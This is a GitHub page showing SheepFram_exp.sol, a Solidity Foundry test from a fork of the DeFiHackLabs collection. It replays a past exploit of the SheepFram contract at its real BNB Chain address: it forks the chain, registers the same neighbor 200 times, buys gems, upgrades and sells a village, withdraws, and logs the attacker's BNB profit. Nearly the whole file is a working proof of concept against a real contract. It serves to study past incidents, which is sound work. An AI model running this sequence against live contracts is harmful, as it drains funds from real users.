forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 3
/
SheepFram_exp.sol
52 lines (43 loc) · 1.57 KB
/
SheepFram_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
// @Analysis
// https://twitter.com/AnciliaInc/status/1592658104394473472
// https://twitter.com/BlockSecTeam/status/1592734292727455744
// @Tx
// https://bscscan.com/tx/0x5735026e5de6d1968ab5baef0cc436cc0a3f4de4ab735335c5b1bd31fa60c582
interface SheepFram{
function register(address neighbor) external;
function addGems() payable external;
function upgradeVillage(uint256 framId) external;
function withdrawMoney(uint256 wool) external;
function sellVillage() external;
}
contract ContractTest is DSTest{
SheepFram sheepFram = SheepFram(0x4726010da871f4b57b5031E3EA48Bde961F122aA);
address neighbor = 0x14598f3a9f3042097486DC58C65780Daf3e3acFB;
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("bsc", 23088156);
}
function testExploit() public payable{
for(uint8 i = 0; i < 200; i++){
sheepFram.register(neighbor);
}
sheepFram.addGems{value: 5 * 1e14}();
for(uint8 i = 0; i < 3; i++){
sheepFram.upgradeVillage(i);
}
sheepFram.sellVillage();
uint BalanceBefore = address(this).balance;
sheepFram.withdrawMoney(20_000);
uint BalanceAfter = address(this).balance;
emit log_named_decimal_uint(
"Attacker BNB profit after exploit",
(BalanceAfter - BalanceBefore),
18
);
}
receive() payable external{}
}